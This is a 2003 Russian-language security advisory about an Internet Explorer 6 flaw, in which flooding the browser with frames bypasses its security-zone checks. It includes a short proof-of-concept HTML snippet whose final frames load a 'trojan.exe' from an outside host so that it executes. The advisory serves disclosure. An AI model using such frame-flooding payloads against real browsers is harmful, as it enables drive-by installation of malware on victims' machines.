Security Lab

Microsoft Internet Explorer может выполнить произвольный код при обработке больших количеств запросов загрузки

Дата публикации:19.05.2003
Всего просмотров:970
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft Internet Explorer (IE). Удаленный пользователь может сконструировать HTML, который заставит браузер выполнить произвольный код.

Сообщается, что удаленный пользователь может сконструировать HTML, который, когда будет загружен в браузере, заставит IE открыть большое количество фреймов. Если последние несколько фреймов ссылаются на злонамеренный файл, расположенный на удаленном сервере, IE не в состоянии проверить ограничения зоны безопасности для этих фреймов и выполнит произвольный код.

Уязвимость затрагивает не все версии IE. На уязвимых версиях существует некоторая вероятность несрабатывания уязвимости. Например, в IE 6.0.2800.1106 на Windows 2000 успешная работа эксплоита будет наблюдаться в 95% случаях. Пример:

FRAME SRC="C:\winnt\welcome.exe"></FRAME>
<FRAME SRC="C:\winnt\notepad.exe"></FRAME>
<FRAME SRC="C:\winnt\regedit.exe"></FRAME>
... together around 191 ... and after comes our trojan ...
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
Уязвимость обнаружена в Microsoft Internet Explorer 6, tested on 6.0.2800.1106 on Windows 2000
Ссылки: Flooding Internet Explorer 6.0.2800 (6.x?) security zones !